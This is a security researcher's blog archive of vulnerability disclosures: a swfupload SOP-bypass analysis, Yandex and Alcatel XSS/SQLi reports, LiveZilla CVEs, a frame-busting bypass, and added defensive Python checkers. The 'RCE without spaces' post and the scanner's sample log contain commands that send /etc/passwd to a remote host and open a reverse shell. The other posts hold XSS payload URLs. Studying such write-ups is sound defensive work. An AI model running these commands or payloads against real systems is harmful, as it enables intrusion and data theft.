Saturday, 1 March 2014

Analysis of swfupload CVE-2013-2205 Security.allowDomain('*') flaw

Intro

Yes, I know it's an old one. Since I have lots of stuff to do, I only had a small amount of time to take a closer look at this vulnerability, found by Szymon Gruszecki and identified by CVE-2013-2205. But I also wanted to understand how to exploit this kind of issue. Since I couldn't find any useful PoCs or examples on the Internet, I decided to learn it and write a post. I believe it will be useful for someone. :)

First, please take a look at the swfupload fix for this vuln. Yes, it's just one removed line. :)

Security.allowDomain('*')


This will be short; for details please see the Adobe documentation. Security.allowDomain() is a function that allows a Flash movie to be embedded on, and interacted with from, another domain (with '*' as the argument, from any domain at all). For example, we have resource-a.com where swf-a.swf is stored (with Security.allowDomain('resource-b.com')); we are then able to embed swf-a.swf on resource-b.com and interact with all functions that were exposed through the ExternalInterface.addCallback() method.

Depending on the application context, this can be used for example to bypass the Same-Origin Policy. How? If our swf-a.swf can make HTTP requests to the resource hosting it and the response can somehow be passed to our JavaScript code... you know what's next ;-)
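As an added example (not part of the original post, and not code from the swfupload project), here is a small Python triage helper a defender can run over the SWF files shipped with a web application. It unwraps the FWS (plain) or CWS (zlib) container and looks for the constant-pool strings that a Security.allowDomain() call with a wildcard leaves behind next to ExternalInterface.addCallback(). The SWF bodies below are constructed inline, and the string-adjacency heuristic is an assumption of this example: a hit only means the file deserves a manual look, not that it is definitely vulnerable.

```python
import re
import struct
import zlib

# Constructed sample: bytes shaped like ABC constant-pool entries (length byte
# followed by the UTF-8 string). This is NOT a real swfupload.swf.
FAKE_BODY_WILDCARD = (
    b"\x00" * 16
    + b"\x0cflash.system\x08Security\x0ballowDomain\x01*"
    + b"\x11ExternalInterface\x0baddCallback"
    + b"\x00" * 8
)
# The same body with the wildcard replaced by a single named domain.
FAKE_BODY_FIXED = FAKE_BODY_WILDCARD.replace(b"\x01*", b"\x0eresource-b.com")


def make_swf(body: bytes, compressed: bool = True, version: int = 10) -> bytes:
    """Wrap *body* in a minimal SWF container: signature, version, total length."""
    signature = b"CWS" if compressed else b"FWS"
    header = signature + bytes([version]) + struct.pack("<I", 8 + len(body))
    return header + (zlib.compress(body) if compressed else body)


def swf_body(data: bytes) -> bytes:
    """Return the tag data of an FWS (plain) or CWS (zlib-compressed) SWF."""
    if len(data) < 8:
        raise ValueError("too short to be a SWF")
    signature = data[:3]
    if signature == b"FWS":
        return data[8:]
    if signature == b"CWS":
        return zlib.decompress(data[8:])
    if signature == b"ZWS":
        raise ValueError("LZMA-compressed SWF (ZWS) is not handled by this helper")
    raise ValueError("not a SWF file")


# Heuristic patterns (an assumption of this example): a length-1 constant "*"
# directly after "allowDomain" is what Security.allowDomain('*') tends to leave
# in the pool; "addCallback" means JavaScript on the embedding page can call in.
ALLOW_DOMAIN = re.compile(rb"allowDomain")
WILDCARD_AFTER_ALLOW_DOMAIN = re.compile(rb"allowDomain\x01\*")
ADD_CALLBACK = re.compile(rb"addCallback")


def audit_swf(data: bytes) -> dict:
    """Flag SWF files that look like they open their callbacks to every domain."""
    body = swf_body(data)
    uses_allow_domain = ALLOW_DOMAIN.search(body) is not None
    wildcard = WILDCARD_AFTER_ALLOW_DOMAIN.search(body) is not None
    exposes_callbacks = ADD_CALLBACK.search(body) is not None
    return {
        "allowDomain": uses_allow_domain,
        "wildcard": wildcard,
        "addCallback": exposes_callbacks,
        # Worth a manual review when any origin may drive exported callbacks.
        "review": wildcard and exposes_callbacks,
    }


if __name__ == "__main__":
    for label, body in (("wildcard", FAKE_BODY_WILDCARD), ("fixed", FAKE_BODY_FIXED)):
        print(label, audit_swf(make_swf(body)))
```

Run it against real files with `audit_swf(open(path, "rb").read())`; anything with `review` set should be decompiled and the actual allowDomain() argument checked, exactly as the one-line swfupload fix above does by removing the call.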

Analysis

The most interesting functions we should look at are StartUpload(), ReturnUploadStart(), HTTPError_Handler() and UploadSuccess():



UploadSuccess() is called after a successful upload (wow). As we can see, it calls the UploadSuccess callback (which can be set to our own JavaScript function) with serverData as one of the parameters; serverData is the response body returned by the requested uploadURL.

The attack

OK, so if we are able to get the content of another resource (SOP bypass), we are able to steal CSRF tokens from forms. The attack scenario is simple: zoczus.mooo.com embeds the swfupload from the WordPress 3.5.1 installation on lab.ropchain.org. After the victim (logged into the wp-admin panel) uploads any file, we'll make a request to user-new.php, parse the response for the nonce value, and make a standard CSRF attack to add another admin account. No other interaction (than the file upload) is needed.
I created this proof of concept. Remember to change wordpress-url to a valid WordPress resource.

Exploit in action:

Thursday, 19 December 2013

Yandex Metrica multiple XSS vulnerabilities

OK, some time ago I found a few XSS vulnerabilities in one of Yandex's services, called Metrika. Most are fixed now, so I can publish the Proofs of Concept. :)

1) Reflected XSS - [somewhere]

(this one is still not fixed, so it will be disclosed in the future; it's nothing special really)

2) Stored XSS - external links

The demonstration video is quite long because I was creating the PoC while recording. ;-)

http://www.youtube.com/watch?v=ZhNn0uYXpL8

3) Stored XSS - Webvisor

Visiting your website (one with the Metrica counter installed) with a URL like this:

http://hostname/x.htm?<img/src="XXX"/onerror="alert(1)">ab

caused Metrica Webvisor to render it without escaping, which is just another stored XSS.

4) Stored XSS - file downloads

http://www.youtube.com/watch?v=4xgcjisyzK8

5) Stored XSS - Clickpath analysis

http://www.youtube.com/watch?v=SqTSoCd86Sk

6) Reflected XSS - Form Data analysis

http://www.youtube.com/watch?v=LALvffnT-vQ

7) *BONUS* Out of scope (so unrewarded): reflected XSS in yandex.st.

http://yandex.st/mail/neo2/7.35.2005/static/swf/web-socket.swf?onLoad=this.alert('XSS')

Effect + source code:


And that's all for today. :)

Saturday, 14 December 2013

[EN] LiveZilla multiple vulnerabilities

I was looking a bit into the LiveZilla source code and found a few vulnerabilities. Most of them were fixed in 5.1.2.1, released a few days ago. Details:


CVE-2013-7034 - LiveZilla 5.1.2.0 PHP Object Injection
CVE-2013-7033 - LiveZilla 5.1.2.0 Insecure password storage
CVE-2013-7032 - LiveZilla 5.1.2.0 Multiple Stored XSS in webbased operator client
CVE-2013-7003 - LiveZilla 5.1.1.0 Stored XSS in operator clients
CVE-2013-7002 - LiveZilla 5.1.0.0 Reflected XSS in translations


Thursday, 10 October 2013

[EN] Unix RCE without spaces

You have a Remote Code Execution bug, but spaces are removed. How do you pass parameters in this case? And what if we can't see the result of the executed command? Let's do a small trick: redirecting standard input / output.

Here we go:

zoczus@hell:~$ cat</etc/debian_version 
7.1

:) Can't see the output? Send it over the Internet!

[host1]
zoczus@hell:~$ cat</etc/passwd>/dev/tcp/xxxx.pl/5060


[host2]
zoczus@jano:~$ nc -l -p 5060
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
(...)

Looks all right ;) You can also create a reverse shell:

sh</dev/tcp/xxxx.pl/5060>/dev/tcp/xxxx.pl/2222

So now the /bin/sh input (commands) will be taken from xxxx.pl:5060 and the result sent to xxxx.pl:2222. Note that /dev/tcp is a bash feature rather than a kernel device, so the shell interpreting the command line has to be bash for these redirections to open a connection.
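From the detection side, the tricks above leave a recognisable shape in web-server logs once the request is URL-decoded: a command word glued to `<` with no space, and `/dev/tcp/host/port` as a redirection target. The Python scanner below is an added example, not part of the original post; the access-log lines are constructed, the hostnames are placeholders, and the regexes are this example's own signatures rather than rules from any product.

```python
import re
from urllib.parse import unquote_plus

# Constructed web-server access log. The two middle lines carry the redirection
# tricks from the post, %-encoded the way a browser or client would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2013:12:00:01 +0200] "GET /index.php?page=about HTTP/1.1" 200 512
10.0.0.9 - - [10/Oct/2013:12:00:07 +0200] "GET /ping.php?host=;cat%3C/etc/passwd%3E/dev/tcp/attacker.example/5060 HTTP/1.1" 200 12
10.0.0.9 - - [10/Oct/2013:12:00:09 +0200] "GET /ping.php?host=;sh%3C/dev/tcp/attacker.example/5060%3E/dev/tcp/attacker.example/2222 HTTP/1.1" 200 12
10.0.0.7 - - [10/Oct/2013:12:00:11 +0200] "GET /search?q=a%3Cb HTTP/1.1" 200 2048
"""

REQUEST_LINE = re.compile(r'"(?:GET|POST|PUT|DELETE) (\S+) HTTP/')

# One signature per trick shown in the post (assumptions of this example).
SIGNATURES = {
    # bash pseudo-device used to push data over the network
    "dev_tcp": re.compile(r"/dev/tcp/[^\s/]+/\d+"),
    # a shell command whose stdin is redirected with no space before '<'
    "input_redirect": re.compile(r"\b(?:cat|sh|bash|dash|ksh)<(?!<)\S"),
    # stdout redirected straight into /dev/tcp with no space before '>'
    "output_redirect": re.compile(r"[^\s>]>(?!>)/dev/tcp/"),
}


def decoded_request(line: str):
    """Extract the request target from an access-log line and URL-decode it."""
    m = REQUEST_LINE.search(line)
    if not m:
        return None
    # Decode twice so one extra layer of %-encoding does not hide the payload.
    return unquote_plus(unquote_plus(m.group(1)))


def scan_request(target: str):
    """Return the sorted names of every signature that matches the decoded target."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(target))


def scan_log(lines):
    """Return (1-based line number, matched signature names) for suspicious lines."""
    hits = []
    for number, line in enumerate(lines, start=1):
        target = decoded_request(line)
        if target is None:
            continue
        matches = scan_request(target)
        if matches:
            hits.append((number, matches))
    return hits


if __name__ == "__main__":
    for number, matches in scan_log(SAMPLE_LOG.splitlines()):
        print(f"line {number}: {', '.join(matches)}")
```

The fourth sample line (`a<b` in a search query) is there on purpose: a bare `<` is common in legitimate traffic, so the signature anchors on a command word immediately before it rather than on the character alone. Egress filtering and an outbound-connection alert on the web server cover the `/dev/tcp` case even when the request never reaches a log.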

I hope this one was useful ;)

Friday, 27 September 2013

[EN] Alcatel OneTouch Website - XSS & SQL Injection

So, the first thing is that both bugs are really obvious... I can't believe they existed for so long on the official Alcatel One Touch website.

How to reproduce the bug:
1) Go to the http://alcatelonetouch.com website
2) Search for bad'syntax or f<script>alert(1);</script>
3) Get an alert or a PHP error (depending on whether you're triggering the XSS or the SQLi).

XSS:



SQLi:



I think this case is so basic that it doesn't need to be explained.

OK, now the funny part: the timeline.

05/02/2013 - discovered the bug
06/02/2013 - contact via the e-mail address provided in the WHOIS database
13/02/2013 - no response, contacted USSupport@tcl.com
11/03/2013 - mailed the Polish Alcatel-Lucent department asking for some contact info for my case
11/03/2013 - response from Alcatel-Lucent: forwarded me to TCL Communication
12/03/2013 - mail sent using the official TCL contact form
13/03/2013 - after googling, found an employee working for TCL and their contact info; sent mail.
29/04/2013 - no response; tried to make contact via info.america@tcl.com
12/06/2013 - still no response, tried to contact some sales managers found on the Alcatel website
28/06/2013 - tweeted @ALCATELONETOUCH about the vuln and asked for contact information
02/07/2013 - no response; another tweet.
04/07/2013 - still no response; another tweet
08/07/2013 - ...and another ;)
09/07/2013 - everybody please sit down: I got the first Alcatel response. It says I should contact them via their official Facebook page.
09/07/2013 - Contacted them via Facebook.
10/07/2013 - Response confirming that the information that I had found some issue on their website was sent to their "team".
10/07/2013 - The problem was that I hadn't provided any details about the vulnerability, not even what kind of issue it was ;) I asked if they needed any details.
11/07/2013 - I sent a really detailed advisory about the vulnerability I found.
16/07/2013 - got a response confirming that my details were shared with their tech team.
24/07/2013 - tried to get some other info; no response
07/08/2013 - ping -> no response.
27/09/2013 - not fixed -> public disclosure

Feel free to comment. :)

-- UPDATE --
On 12/11/2013 one of the TCL IT managers responsible for the AlcatelOneTouch.com website contacted me. We cooperated to fix these issues and from now on it's OK. :)

Thursday, 29 August 2013

Yandex Bug Bounty - Multiple Vulnerabilities

A few weeks ago I reported a few bugs as part of the Yandex Bug Bounty Program. Check them out:

1) Cross-Site Flashing  - wordstat.yandex.com

A bug in ammap.swf that allows us to load configuration files from external resources, modify the Flash content and, of course, abuse it. :)

This resource has been removed now, but here is the payload URL I used:

http://wordstat.yandex.com/flash/ammap/ammap.swf?settings_file=http://myhost/yandex.xml&data_file=http://myhost/evil_data.xml

Configuration files: yandex.xml and evil_data.xml

First, check the context menu and the new option, 'Download users database from this region' ;)


After clicking, our "database" is prepared for download; the information is at the bottom of the page.


When progress reaches 100%, our payload is executed.


2) Stored XSS - Yandex Maps

I made a short PoC video:



3) Mixed-content - Yandex Video

This one wasn't rewarded and in fact all modern browsers block mixed content now (Firefox too). The demonstration video is just for education purposes and fun ;-)




Sunday, 23 June 2013

Winiary Pomysł Na... - bypassing Frame-Busting

You have surely come across the phenomenon known as Clickjacking. At present probably the only effective protection against this type of attack is sending the X-Frame-Options header, which lets us control whether a page may be loaded in a frame or not. Another protection one encounters is so-called Frame Busting. When an attempt is made to load a page with this protection in a frame, the appropriate check runs and the parent page is redirected to the one that was being loaded.

In this post I will present a probably not very original, but working, idea for bypassing a Frame Buster. Tested in Google Chrome 28.0.1500.5-dev running on Slackware Linux 14.0. The website of a popular radio station will serve as the example; it:

1. Does not use X-Frame-Options
2. Uses Frame Busting:

if (window.parent.frames.length != 0) {
    window.parent.location = window.location;
}



The sandbox attribute comes to our aid. Here is an example code fragment that allows the http://eska.pl page to be loaded in a frame:

<iframe sandbox="allow-scripts allow-same-origin allow-forms" src="http://eska.pl" width="800">

The option we left out is allow-top-navigation. Added to the sandbox attribute, it would permit the redirect (which we don't want). As you can see, we achieved our goal:
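The lesson for the defending side is the one the post opens with: a framing check done in JavaScript can be switched off by the embedding page, so the protection has to come from response headers the browser enforces before any script runs. The Python audit helper below is an added example (not code from the post or from any site mentioned in it): it parses a raw response header block and reports whether X-Frame-Options or a Content-Security-Policy frame-ancestors directive restricts framing. The sample responses are constructed and the decision rules are this example's own.

```python
from typing import Dict, List, Optional

# Constructed responses (not captured from any real site).
NO_PROTECTION = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
    "<html>...</html>"
)
XFO_ONLY = (
    "HTTP/1.1 200 OK\r\n"
    "X-Frame-Options: sameorigin\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)
CSP_AND_XFO = (
    "HTTP/1.1 200 OK\r\n"
    "X-Frame-Options: DENY\r\n"
    "Content-Security-Policy: default-src 'self'; frame-ancestors 'none'\r\n"
    "\r\n"
)
CSP_OPEN = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Security-Policy: frame-ancestors *\r\n"
    "\r\n"
)


def parse_headers(raw: str) -> Dict[str, List[str]]:
    """Parse a raw response into {lower-cased name: [values]}, stopping at the body."""
    headers: Dict[str, List[str]] = {}
    for line in raw.splitlines()[1:]:        # skip the status line
        if not line.strip():
            break                            # blank line ends the header block
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def frame_ancestors(csp: str) -> Optional[List[str]]:
    """Return the source list of the frame-ancestors directive, or None if absent."""
    for directive in csp.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            # An empty source list means the same as 'none'.
            return [t.lower() for t in tokens[1:]] or ["'none'"]
    return None


def clickjacking_protection(raw: str) -> dict:
    """Decide whether the response carries a browser-enforced framing restriction."""
    h = parse_headers(raw)
    result = {"x_frame_options": None, "frame_ancestors": None, "protected": False, "notes": []}

    for value in h.get("x-frame-options", []):      # value is case-insensitive
        v = value.upper()
        result["x_frame_options"] = v
        if v in ("DENY", "SAMEORIGIN"):
            result["protected"] = True
        elif v.startswith("ALLOW-FROM"):
            result["notes"].append("ALLOW-FROM is not honoured by every browser; add CSP frame-ancestors")
        else:
            result["notes"].append(f"unrecognised X-Frame-Options value: {value}")

    for value in h.get("content-security-policy", []):
        sources = frame_ancestors(value)
        if sources is None:
            continue
        result["frame_ancestors"] = sources
        if "*" in sources:
            result["notes"].append("frame-ancestors * allows framing from anywhere")
        else:
            result["protected"] = True

    if not result["protected"] and not result["notes"]:
        result["notes"].append("no framing header; script-only frame busting is defeated by a sandboxed iframe")
    return result


if __name__ == "__main__":
    for label, raw in (("none", NO_PROTECTION), ("xfo", XFO_ONLY),
                       ("csp+xfo", CSP_AND_XFO), ("csp-open", CSP_OPEN)):
        print(label, clickjacking_protection(raw))
```

Sending both headers, as in the CSP_AND_XFO sample, covers old browsers that only know X-Frame-Options and new ones that prefer frame-ancestors; the JavaScript check from the radio station's page can stay as a fallback, but nothing should depend on it.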